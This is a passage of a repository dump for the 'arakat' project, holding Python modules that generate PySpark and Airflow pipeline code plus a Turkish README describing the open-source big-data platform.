"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if (bool(extra[\"dfs\"])):\n df_name = \"df_\" + extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.append(df_name + '.selectExpr(\"CAST(' + node[\"parameters\"][\"unique_column_name\"] + ' AS STRING) AS key\", \"to_json(struct(*)) AS value\").writeStream.format(\"kafka\").option(\"kafka.bootstrap.servers\", ')\n code.append(CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"host\"] + \":\" + node[\"parameters\"][\"port\"]) + \")\")\n code.append(\".trigger(\" + __generate_trigger_code(node) + \")\")\n code.append('.option(\"topic\", ' + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"topic\"]) + \")\")\n code.append('.option(\"checkpointLocation\", ' + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"checkpoint_path\"]) + \").start()\")\n code.extend([os.linesep, \"query_\" + node[\"id\"], \".awaitTermination()\", os.linesep])\n\n return code, error\n\ndef __generate_trigger_code(node):\n trigger_type=node[\"parameters\"][\"trigger_type\"]\n if(trigger_type == \"once\"):\n return \"once=True\"\n else:\n return trigger_type + \"=\" + \"'\" + str(node[\"parameters\"][\"trigger_value\"])+\" seconds'\""
},
{
"alpha_fraction": 0.824999988079071,
"alphanum_fraction": 0.824999988079071,
"avg_line_length": 40,
"blob_id": "c780bcdd04824d4f6826f22e449c26c2941fff0a",
"content_id": "c11e8a4bfb912418fc85f3fa3ee5d7e2bb4ca01b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": true,
"language": "TypeScript",
"length_bytes": 40,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 1,
"path": "/arakat-frontend/types/cytoscape-edgehandles/index.d.ts",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "declare module \"cytoscape-edgehandles\";"
},
{
"alpha_fraction": 0.8402777910232544,
"alphanum_fraction": 0.8406084775924683,
"avg_line_length": 156.94737243652344,
"blob_id": "cd1012b225366d6f67b2be2bfbbd2266339afcdf",
"content_id": "08a74059aac3fb20d2373c5e2bde503715fcc1bc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3278,
"license_type": "permissive",
"max_line_length": 523,
"num_lines": 19,
"path": "/docs/README.md",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "# ARAKAT\r\n\r\n## Hakkında\r\nİş zekası uygulamaları temelinde eldeki verinin anlamlandırılarak bilgiye dönüştürülmesi faaliyetlerini içerir. Bu bağlamda iş zekası uygulamalarının temel bileşenleri veri işleme, veri analizi ve bilgi raporlama olarak belirlenebilir. ARAKAT'ın amacı, bu ana bileşenlerin her biri için temel teşkil edebilecek açık kaynak kodlu ve platform bağımsız alt yapılar geliştirilmesidir. Karar verme, öngörü analizi, gerçek zamanlı veri işleme, \"mobile first\" veri görselleştirme gibi konular projenin çekirdeğinde yer almaktadır.\r\n\r\nARAKAT kapsamında iş zekası ve büyük veri analizi uygulamalarına temel teşkil edebilecek açık kaynak kodlu bir platform geliştirilmesi hedeflenmiştir. Bu platform kullanılarak hem yapısal olmayan (ve büyük) verilerin üzerinde veri analiz işlemleri hem de yapısal verilerin üzerinde iş zekası uygulamaları geliştirilebilmesi ARAKAT'ın ana hedefidir. \r\n\r\nARAKAT temelde üç ana modülden oluşmaktadır. Birinci modül farklı veri kaynaklarından farklı hızlarda alınan verilerin işlenebilir hale getirilmesi (temizleme, maskeleme, vb...) işlerinin kapsandığı \"Veri İçerme\" modülüdür. İkinci modül, içerilen verilerin üzerinde istatistiksel modellerin ve veri yapılarının kurulabildiği \"Veri Analiz\" modülüdür. Üçüncü ve son modül ise yapılan analiz sonuçlarının kullanıcı dostu sunumlar halinde görüntülenmesini sağlayan \"Veri Görselleştirme\" modülüdür.\r\n\r\n## Anahtar Kelimeler\r\nBüyük Veri, Veri Analizi, İş Zekası, Açık Kaynak, Makine Öğrenmesi, Dağıtık Sistemler\r\n\r\n## Proje Kurgusu ve Detaylar\r\nTeknik özellikler ve proje kurgusu ile ilgileri aşağıdaki gibi özetlenebilir:\r\n- Açık Kaynak Kodlu ve GPLv3 Lisanslı Geliştirme: Proje kurgusu tamamı ile açık kaynak üzerine kurgulanmıştır. Buradaki temel amaç geliştirimi devam eden ve/veya yeni geliştirilecek uygulamaların jenerik kısımları için açık kaynak camiasının desteğini almak ve bu desteği alırken de projelere özgü içeriği ayırarak farklı paydaşların bu ortak alt yapıları kullanabilmesine\r\nolanak tanımaktır.\r\n- Linux tabanlı ve platform bağımsız dağıtım: Projenin geliştirme ve derleme ortamları tamamen Linux tabanlı (Debian türevleri) sistemler olacaktır. Bununla birlikte proje çıktısı çerçevelerin sınandığı referans uygulama bileşenleri de Docker container'ları halinde yayınlanacaktır. Bu sayede ölçeklenebilir (buluta hazır) ve platform bağımsız yapıların geliştirildiği garanti altına alınmış olacaktır.\r\n- Eğitsel içerik ve API dokümantasyonu: Geliştirilecek alt yapılara ilişkin API (Uygulama Programlama Arayüzü) dokümantasyonları Türkçe olarak sürekli entegrasyon sunucusundaki son adım olarak devamlı üretilecek ve dokümantasyonun güncel ve yeterli olduğu kullanıcı geri dönüşleri ile izlenecektir. Söz konusu içerikte Türkiye içinde bir ilk olacak bu materyal hem bu alana yeni giren bireyler/kurumlar için hem de bu alanda öğretim veren kurumlar için faydalanılabilir olacaktır.\r\n- Geliştiricilere açık ortak bir platform: Bu sayede hem yeni bir ekosistem kurularak ulusal fayda sağlanması hedeflenmektedir.\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5896739363670349,
"avg_line_length": 37.10344696044922,
"blob_id": "1ed95b6f8f419537a99e98cbe5b22c43f91d16ba",
"content_id": "7b231f73e9528aa10bed4c2db1e5ad81ade1165e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1104,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 29,
"path": "/arakat-backend/pipeline_generator/family_base/Transformer.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom utils import CodeGenerationUtils\nfrom validity import IncomingEdgeValidityChecker\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if(bool(extra[\"dfs\"])):\n df_name=\"df_\"+extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code = ['transformer_' + node[\"id\"] + ' = ' + node[\"transformer_name\"] + '(']\n for param in node[\"parameters\"]:\n code.extend([param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param]), \", \"])\n code.pop()\n code.extend([\")\", os.linesep])\n\n code.extend(['df_' + node[\"id\"] + \"=\" + 'transformer_' + node[\"id\"] + '.transform(' + df_name + ')', os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.6735074520111084,
"avg_line_length": 43.70833206176758,
"blob_id": "bec85cd533269b1a6b343a061b6a174cbfe64ec2",
"content_id": "4d9376a01fc9dc8b481417e440fd3a023416b479",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1072,
"license_type": "permissive",
"max_line_length": 217,
"num_lines": 24,
"path": "/arakat-backend/pipeline_generator/family_base/StreamReadFromFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker, DataSourceValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {0}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n error, is_schema_appropriate=DataSourceValidityChecker.check_validity(node)\n if(error == ErrorTypes.NO_ERROR):\n # Must be a valid schema at this point.\n code.append(\"schema_\" + node[\"id\"] + \"=\")\n code.extend([CodeGenerationUtils.arrange_schema(node[\"parameter\"][\"schema\"]), os.linesep])\n\n code.extend([\"df_\" + node[\"id\"] + ' = spark.readStream.schema(schema_'+node[\"id\"]+\").\"+node[\"file_type\"]+\"(\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"])+\")\", os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.625986635684967,
"alphanum_fraction": 0.6305403709411621,
"avg_line_length": 48.17910385131836,
"blob_id": "4b0aced6e6d0a279fb61d8402de94f4e2c52401b",
"content_id": "39f0d808ffaa0a25795088f05962a6c6736926c5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3294,
"license_type": "permissive",
"max_line_length": 219,
"num_lines": 67,
"path": "/arakat-backend/pipeline_generator/family_base/CrossValidator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom utils import CodeGenerationUtils\nfrom validity import IncomingEdgeValidityChecker\nfrom validity import CVValiditiyChecker\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n error, extra2=CVValiditiyChecker.check_validity(node[\"nodes\"], node[\"edges\"])\n\n if(bool(extra[\"dfs\"])):\n df_name=\"df_\"+extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.extend(__generate_code_for_estimator_instantination(node[\"nodes\"][extra2[\"estimator_node_id\"]]))\n code.extend(__generate_code_for_evaluator_instantination(node[\"nodes\"][extra2[\"evaluator_node_id\"]]))\n code.extend(__generate_code_for_param_grid(node, 'estimator_' + extra2[\"estimator_node_id\"]))\n code.extend(__generate_code_for_cv_instantination(node, extra2[\"estimator_node_id\"], extra2[\"evaluator_node_id\"]))\n\n code.extend(['model_' + node[\"id\"] + \"=\" + 'cv_' + node[\"id\"] + \".fit(\" + df_name + \")\", os.linesep])\n # Following might not be logical unless you aim to predict on training data for some specific needs.\n code.extend(['df_' + node[\"id\"] + \"=\" + 'model_' + node[\"id\"] + '.transform(' + df_name + ')', os.linesep])\n\n return code, error\n\ndef __generate_code_for_cv_instantination(cv_node, estimator_node_id, evaluator_node_id):\n return ['cv_'+cv_node[\"id\"] + \"=CrossValidator(estimator=\", 'estimator_' + estimator_node_id + \", estimatorParamMaps=param_grid_\" + cv_node[\"id\"] + \", evaluator=\" + 'evaluator_' + evaluator_node_id +\")\", os.linesep]\n\ndef __generate_code_for_estimator_instantination(node):\n code = ['estimator_' + node[\"id\"] + ' = ' + node[\"estimator_name\"] + '(']\n for param in node[\"parameters\"]:\n code.extend([param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param]), \", \"])\n if (len(node[\"parameters\"]) > 0):\n code.pop()\n code.extend([\")\", os.linesep])\n return code\n\ndef __generate_code_for_param_grid(node, cur_estimator_name):\n code=[\"param_grid_\" + node[\"id\"] + \"=None\"]\n # Assuming that fix parameters are given in the estimator itself.\n # Maybe reconsider this part.\n grid_params = node[\"parameters\"][\"parameter_grid\"]\n if(bool(grid_params)):\n code = [\"param_grid_\" + node[\"id\"] + \"=ParamGridBuilder()\"]\n for param in grid_params:\n code.extend([\".addGrid(\"+cur_estimator_name + \".\" + param + \", \"+ CodeGenerationUtils.arrange_parameter_value(grid_params[param])+\")\"])\n code.extend([\".build()\", os.linesep])\n\n return code\n\ndef __generate_code_for_evaluator_instantination(node):\n code = ['evaluator_' + node[\"id\"] + ' = ' + node[\"evaluator_name\"] + '(']\n for param in node[\"parameters\"]:\n code.extend([param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param]), \", \"])\n if (len(node[\"parameters\"]) > 0):\n code.pop()\n code.extend([\")\", os.linesep])\n return code"
},
{
"alpha_fraction": 0.700560450553894,
"alphanum_fraction": 0.700560450553894,
"avg_line_length": 39.290321350097656,
"blob_id": "196ad881a25f69c43e192d11e0476e7c6ee0d328",
"content_id": "8599bfc3df9e3ac093355df3b919b19581e93cd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2498,
"license_type": "permissive",
"max_line_length": 266,
"num_lines": 62,
"path": "/arakat-backend/pipeline_generator/TaskGenerator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nimport TaskPreprocessor\nfrom domain import ImportInfo, DomainUtils\nfrom utils import GeneralUtils\n\nimport copy\nimport os\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\ndef generate_code(graph):\n # Get task_args from task node itself\n dependents_info, requireds_info, waiting_queue = TaskPreprocessor.preprocess_graph(graph)\n requireds_info_clone=copy.deepcopy(requireds_info)\n generation_order, error_code = TaskPreprocessor.determine_generation_order(dependents_info, requireds_info_clone, waiting_queue)\n\n task_code = []\n errors=[]\n if(error_code == ErrorTypes.NO_ERROR):\n task_code.extend(__generate_initialization_codes(graph))\n task_code.append(os.linesep)\n code, errors = __generate_remaining_codes(generation_order, requireds_info, graph)\n task_code.extend(code)\n\n return task_code, errors\n\ndef __generate_initialization_codes(graph):\n # graph is the task node itself\n\n initialization_code=[\"from pyspark import SparkContext\", os.linesep, \"from pyspark.sql import SparkSession\", os.linesep]\n # Maybe improve the following in the future...\n initialization_code.extend([\"from pyspark.sql.types import *\", os.linesep])\n\n import_set=set()\n for node_id in graph[\"nodes\"]:\n import_statements_for_node=ImportInfo.get_import_statements(graph[\"nodes\"][node_id])\n for elem in import_statements_for_node:\n import_set.add(elem)\n\n for statement in import_set:\n initialization_code.extend([statement, os.linesep])\n\n initialization_code.append(os.linesep)\n\n initialization_code.extend(['sc = SparkContext(appName=\"'+graph[\"app_id\"] + '_Task_' + graph[\"id\"] + '\")', os.linesep])\n initialization_code.extend(['spark = SparkSession(sc)', os.linesep, os.linesep])\n\n return initialization_code\n\ndef __generate_remaining_codes(generation_order, requireds_info, graph):\n code=[]\n errors=[]\n for elem in generation_order:\n cur_code, error=GeneralUtils.call_function_by_name(\"pipeline_generator.family_base.\"+DomainUtils.get_node_family_name(graph[\"nodes\"][elem][\"family\"]), \"generate_code\", {\"node\": graph[\"nodes\"][elem], \"requireds_info\": requireds_info, \"edges\": graph[\"edges\"]})\n if(error == ErrorTypes.NO_ERROR):\n code.extend(cur_code)\n else:\n errors.append(error)\n\n # Do not break to capture all errors...\n return code, errors\n"
},
{
"alpha_fraction": 0.6365583539009094,
"alphanum_fraction": 0.6401285529136658,
"avg_line_length": 46.08403396606445,
"blob_id": "f57998bda3fb3214bb41000c1f6079cc56471385",
"content_id": "f1e13feb4eabd2923ae7d933691dfcd5febfdb25",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5602,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 119,
"path": "/arakat-backend/pipeline_generator/GraphPreprocessor.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.HighLevelNodeTypes import HighLevelNodeTypes\nfrom domain.ErrorTypes import ErrorTypes\nfrom domain import DomainUtils\n# Assume that there are 2 levels of compound nodes:\n# 1) Tasks\n# 2) Pipeline nodes/CV nodes under task nodes (No more depth)\n# Hence, CV nodes can't have pipelines, but estimators only. CV node can have an estimator and evaluator node, connected with an edge!\n# When estimator is in CV node, it will also keep grid parameters/info which are obtained from user.\n# A task node can't include another task node.\n# An edge can only connect siblings (with the same parent)\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\n# Re-write a clear version...\n\ndef preprocess_graph(graph):\n task_nodes={}\n task_edges={}\n\n for edge_id in graph[\"edges\"]:\n cur_node_ids=edge_id.split(\"-\")\n cur_nodes=[]\n for node_id in cur_node_ids:\n cur_nodes.append(graph[\"nodes\"][node_id])\n\n parent_info=__check_parents(cur_nodes, graph[\"nodes\"])\n if(parent_info[\"error\"] != ErrorTypes.NO_ERROR):\n return task_nodes, task_edges, parent_info[\"error\"]\n\n if(parent_info[\"parent_type\"] == HighLevelNodeTypes.NO_NODE):\n task_edges[edge_id]=graph[\"edges\"][edge_id]\n __add_task_nodes(cur_nodes, task_nodes)\n elif(DomainUtils.is_compound(parent_info[\"parent_type\"].value)):\n __add_nodes_of_compounds(edge_id, graph[\"edges\"][edge_id], cur_nodes, parent_info, task_nodes, graph[\"nodes\"])\n elif(parent_info[\"parent_type\"] == HighLevelNodeTypes.TASK_NODE):\n __add_inner_nodes(edge_id, graph[\"edges\"][edge_id], cur_nodes, parent_info, task_nodes, graph[\"nodes\"])\n\n return task_nodes, task_edges, ErrorTypes.NO_ERROR\n\ndef __add_inner_nodes(edge_id, edge_info, cur_nodes, parent_info, task_nodes, graph_nodes):\n task_id = parent_info[\"parent_id\"]\n if (task_id not in task_nodes):\n task_nodes[task_id] = graph_nodes[task_id]\n task_nodes[task_id].update({\"nodes\": {}, \"edges\": {}})\n\n task_nodes[task_id][\"edges\"][edge_id]=edge_info\n\n for node in cur_nodes:\n if(DomainUtils.is_compound(node[\"node_type\"])):\n add_compund_nodes(cur_nodes, task_id, task_nodes)\n else:\n task_nodes[task_id][\"nodes\"][node[\"id\"]] = node\n\ndef add_compund_nodes(cur_nodes, task_id, task_nodes):\n for node in cur_nodes:\n if(node[\"id\"] not in task_nodes[task_id][\"nodes\"]):\n task_nodes[task_id][\"nodes\"][node[\"id\"]]=node\n task_nodes[task_id][\"nodes\"][node[\"id\"]][\"nodes\"] = {}\n task_nodes[task_id][\"nodes\"][node[\"id\"]][\"edges\"] = {}\n\ndef __add_task_nodes(cur_nodes, task_nodes):\n for node in cur_nodes:\n if(node[\"id\"] not in task_nodes):\n task_nodes[node[\"id\"]]=node\n task_nodes[node[\"id\"]][\"nodes\"] = {}\n task_nodes[node[\"id\"]][\"edges\"] = {}\n\ndef __add_nodes_of_compounds(edge_id, edge_info, cur_nodes, parent_info, task_nodes, graph_nodes):\n compound_id=parent_info[\"parent_id\"]\n task_id=parent_info[\"meta_parent_id\"]\n\n if (task_id not in task_nodes):\n task_nodes[task_id] = graph_nodes[task_id]\n task_nodes[task_id].update({\"nodes\": {}, \"edges\": {}})\n\n if (compound_id not in task_nodes[task_id][\"nodes\"]):\n task_nodes[task_id][\"nodes\"][compound_id] = graph_nodes[compound_id]\n task_nodes[task_id][\"nodes\"][compound_id].update({\"nodes\": {}, \"edges\": {}})\n\n task_nodes[task_id][\"nodes\"][compound_id][\"edges\"][edge_id]=edge_info\n\n for node in cur_nodes:\n task_nodes[task_id][\"nodes\"][compound_id][\"nodes\"][node[\"id\"]] = node\n\n\ndef __check_parents(cur_nodes, nodes):\n parent1 = cur_nodes[0][\"parent\"]\n parent2 = cur_nodes[1][\"parent\"]\n # No nodes (except Task nodes) can have a None parent.\n if(parent1 is None and parent2 is None):\n # Edge between task\n return {\"parent_type\": HighLevelNodeTypes.NO_NODE, \"error\": ErrorTypes.NO_ERROR}\n elif(parent1 is None and parent2 is not None):\n # Error: since task node cannot be connected with inner nodes (non-task nodes)\n # Error: tasks can't include other tasks as inner nodes\n if(nodes[parent2][\"node_type\"] == HighLevelNodeTypes.TASK_NODE.value):\n return {\"error\": ErrorTypes.TASK_INSIDE_TASK_ERROR}\n return {\"error\": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}\n elif(parent1 is not None and parent2 is None):\n # Error: since task node cannot be connected with inner nodes (non-task nodes)\n # Error: tasks can't include other tasks as inner nodes\n if (nodes[parent1][\"node_type\"] == HighLevelNodeTypes.TASK_NODE.value):\n return {\"error\": ErrorTypes.TASK_INSIDE_TASK_ERROR}\n return {\"error\": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}\n else:\n # Both node have parents.\n\n # Nodes with an edge must have same parents (No Cross Edges).\n # -> No edges between inner nodes of different tasks\n # -> No edges between inner nodes and nodes under pipeline nodes/cv nodes\n # Determine the parent type: Task Node, Pipeline Node or CV Node...\n\n if(parent1 == parent2):\n # Siblings of same parents, satisfies conditions above...\n # Meta-parent will be used when the parent is pipeline node or cv node.\n return {\"parent_id\": parent1, \"parent_type\": HighLevelNodeTypes(nodes[parent1][\"node_type\"]), \"meta_parent_id\": nodes[parent1][\"parent\"], \"error\": ErrorTypes.NO_ERROR}\n else:\n return {\"error\": ErrorTypes.NOT_SIBLING_ERROR}"
},
{
"alpha_fraction": 0.6091290712356567,
"alphanum_fraction": 0.6101784110069275,
"avg_line_length": 53.485713958740234,
"blob_id": "cfb275100671fc66a3fbb217a91004eaf4e1f845",
"content_id": "e5884fb94ad9b883da306de7714323fde375fd46",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1906,
"license_type": "permissive",
"max_line_length": 218,
"num_lines": 35,
"path": "/arakat-backend/pipeline_generator/family_base/BatchReadFromFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker, DataSourceValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node=args[\"node\"]\n requireds_info=args[\"requireds_info\"]\n edges=args[\"edges\"]\n\n checklist={\"df_count\": {0}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n error, is_schema_appropriate=DataSourceValidityChecker.check_validity(node)\n if(error == ErrorTypes.NO_ERROR):\n remaining_params = node[\"parameters\"].keys()\n remaining_params.remove(\"file_path\")\n if(is_schema_appropriate):\n code.append(\"schema_\"+node[\"id\"]+\"=\")\n code.extend([CodeGenerationUtils.arrange_schema(node[\"parameter\"][\"schema\"]), os.linesep])\n code.append(\"df_\" + node[\"id\"] + \"=\" + \"spark.read.\"+ node[\"file_type\"] +\"(path=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"] + \", \" + \"schema=\"+ \"schema_\"+node[\"id\"]))\n remaining_params.remove(\"schema\")\n else:\n if(node[\"can_infer_schema\"]):\n code.append(\"df_\" + node[\"id\"] + \"=\" + \"spark.read.\" + node[\"file_type\"] + \"(path=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]) +\", \" +\"inferSchema=\"+\"True\")\n else:\n code.append(\"df_\" + node[\"id\"] + \"=\" + \"spark.read.\" + node[\"file_type\"] + \"(path=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]))\n\n for param in remaining_params:\n code.extend([\", \" + param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param])])\n code.extend([\")\", os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.6475953459739685,
"alphanum_fraction": 0.6488391160964966,
"avg_line_length": 39.8983039855957,
"blob_id": "a1c9324fea11fe21ff91f12de1f230a7660693cc",
"content_id": "e1de2e9d750c63724f3367b90046c3dd1e35de1f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2412,
"license_type": "permissive",
"max_line_length": 196,
"num_lines": 59,
"path": "/arakat-backend/pipeline_generator/ScheduleGenerator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from utils import CodeGenerationUtils\n\nimport os\n\n# spark_runner_path is relative to the airflow server/cluster such that airflow will use this bash script with BashOperator.\n\n# Maybe later read them from config files...\n__set_of_datetime_arguments={\"start_date\", \"end_date\"}\n__datetime_format=\"%d/%m/%Y\"\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\ndef generate_code(task_nodes, task_edges, args):\n # Add error checks\n errors=[]\n dag_code = __generate_imports()\n dag_code.extend(__instantinate_dag(args[\"dag_args\"]))\n for task_node_id in task_nodes:\n dag_code.append(os.linesep)\n dag_code.extend(__create_bash_operator(task_node_id, args[\"spark_runner_path\"]))\n dag_code.append(os.linesep)\n\n dag_code.extend([os.linesep, os.linesep])\n for edge in task_edges:\n node_ids=edge.split(\"-\")\n dag_code.append(os.linesep)\n dag_code.append(\"Task_\"+node_ids[1]+\".set_upstream(\"+\"Task_\"+node_ids[0]+\")\")\n dag_code.append(os.linesep)\n\n return dag_code, errors\n\n\ndef __generate_imports():\n import_code=[\"from airflow import DAG\", os.linesep,\n \"from airflow.operators.bash_operator import BashOperator\", os.linesep,\n \"from datetime import datetime\",os.linesep,os.linesep]\n return import_code\n\ndef __instantinate_dag(airflow_args):\n dag_code=['dag = DAG(\"' + airflow_args[\"app_id\"] + '\", default_args=' + __arg_dict_to_string(airflow_args[\"default_args\"]) + ', schedule_interval=\"' + airflow_args[\"schedule_interval\"] + '\")']\n dag_code.append(os.linesep)\n return dag_code\n\ndef __create_bash_operator(task_id, spark_runner_path):\n return ['Task_'+task_id+'= BashOperator(task_id=\"'+task_id+'\", bash_command=\"'+spark_runner_path+' Task_'+task_id+'.py \", dag=dag)']\n\ndef __arg_dict_to_string(args):\n # Assuming that corresponding argument is a string which is appropriate for pre-defined datetime format.\n code=[\"{\"]\n for arg in args:\n if(arg in __set_of_datetime_arguments):\n code.extend(['datetime.strptime(\"' + args[arg] + '\", \"' + __datetime_format +'\")', \",\"])\n else:\n code.extend([CodeGenerationUtils.arrange_parameter_value(arg), \": \", CodeGenerationUtils.arrange_parameter_value(args[arg]), \",\"])\n if (len(args) > 0):\n code.pop()\n code.append(\"}\")\n return ''.join(code)"
},
{
"alpha_fraction": 0.62442547082901,
"alphanum_fraction": 0.6290216445922852,
"avg_line_length": 43.82352828979492,
"blob_id": "7f31098a3384a4c8db30fc8379cb523b7b04a341",
"content_id": "dc71165cccf277489cd5e87362e68886ee40c6e3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1523,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 34,
"path": "/arakat-backend/pipeline_generator/family_base/StreamWriteToFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if (bool(extra[\"dfs\"])):\n df_name = \"df_\" + extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.append(\"query_\" + node[\"id\"] + \"=\" + df_name + \".writeStream.format(\"+CodeGenerationUtils.arrange_parameter_value(node[\"file_type\"])+\")\")\n code.append(\".trigger(\"+ __generate_trigger_code(node) +\")\")\n code.append('.option(\"path\", '+ CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]) + \")\")\n code.append('.option(\"checkpointLocation\", ' + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"checkpoint_path\"]) + \").start()\")\n code.extend([os.linesep, \"query_\" + node[\"id\"], \".awaitTermination()\", os.linesep])\n\n return code, error\n\ndef __generate_trigger_code(node):\n trigger_type=node[\"parameters\"][\"trigger_type\"]\n if(trigger_type == \"once\"):\n return \"once=True\"\n else:\n return trigger_type + \"=\" + \"'\" + str(node[\"parameters\"][\"trigger_value\"])+\" seconds'\""
},
{
"alpha_fraction": 0.620512843132019,
"alphanum_fraction": 0.6217948794364929,
"avg_line_length": 35.5625,
"blob_id": "dc5f84a9e366f14b2e6d01aef8cbb8d4d2b23898",
"content_id": "0881435660cf7e270a39f4b20313ae33611f5b5e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2340,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 64,
"path": "/arakat-backend/pipeline_generator/PipelineGenerator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
